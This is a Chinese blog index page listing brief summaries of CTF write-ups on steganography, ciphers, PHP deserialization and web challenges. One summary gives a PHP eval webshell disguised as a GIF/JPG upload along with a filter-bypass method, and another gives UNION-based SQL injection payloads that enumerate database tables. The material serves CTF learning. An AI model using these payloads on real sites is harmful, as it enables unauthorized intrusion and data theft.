上一页 1 2 3 4 5 6 7 8 9 10 ··· 13 下一页
摘要: 下载之后是两张gif,有一个打不开,用hxd打开发现没有gif文件头 改了之后就能看到flag flag{zhi_yin_you_are_beautiful} 阅读全文
posted @ 2020-12-06 17:17 夜布多 阅读(661) 评论(0) 推荐(0)
摘要: 这道题就是简单的仿射密码解密网站 flag出 阅读全文
posted @ 2020-11-02 23:31 夜布多 阅读(219) 评论(0) 推荐(0)
摘要: 把图片binwalk foremost分离 在output文件夹里就有分离出来的东西了,有个压缩包,解压出来 出来一个福利.docx,里面是个二维码 flag出 flag{you are the best!} 阅读全文
posted @ 2020-10-25 15:41 夜布多 阅读(244) 评论(0) 推荐(0)
摘要: 打开之后 看源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__fil 阅读全文
posted @ 2020-10-24 17:03 夜布多 阅读(510) 评论(0) 推荐(0)
摘要: 进去之后让上传东西,想上传一个一句话木马,发现只让上传图片格式的,并有前端过滤 那我们把一句话写到一个文本文件里,再把后缀名改为jpg GIF89a <script language="php">eval($_POST['shell']);</script> 上传,bp拦截包,改包,将后缀名由jpg 阅读全文
posted @ 2020-10-24 16:38 夜布多 阅读(129) 评论(0) 推荐(0)
摘要: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 注意到了_wakeup(),如果需要反序列化的时候,php才会调用_wakeup()。所以我们需要利用反序列化。 阅读全文
posted @ 2020-10-24 16:09 夜布多 阅读(774) 评论(0) 推荐(0)
摘要: binwalk常用命令之提取binwalk出的隐藏文件 -e 分解出压缩包 binwalk -e pcat.bin //要分解的文件名 -D或者–dd 分解某种类型的文件(在windows里要用双引号括起来) binwalk -D=jpeg/*文件类型*/ pcat.bin //要分解的文件名 -M 阅读全文
posted @ 2020-10-24 00:29 夜布多 阅读(1276) 评论(0) 推荐(0)
摘要: 简单审计一下源码 <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); //反转字符串 // echo $_o; fo 阅读全文
posted @ 2020-10-23 23:30 夜布多 阅读(483) 评论(0) 推荐(0)
摘要: 查看源码之后 带着script标签一同保存到本地里,保存为后缀名为html的文件,并把里面的eval改为alert,让他可以弹出来,打开文件 啊哦,出来了,整理一下 function $(){ var e=document.getElementById("c").value; if(e.length 阅读全文
posted @ 2020-10-23 23:08 夜布多 阅读(222) 评论(0) 推荐(0)
摘要: 两个方法,嘿嘿嘿 手工注 首先用 ' and 0 union select 1,2,3# 来初步判断该sql查询返回三列数据 然后就可以找表 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS# 阅读全文
posted @ 2020-10-23 22:35 夜布多 阅读(169) 评论(0) 推荐(0)
上一页 1 2 3 4 5 6 7 8 9 10 ··· 13 下一页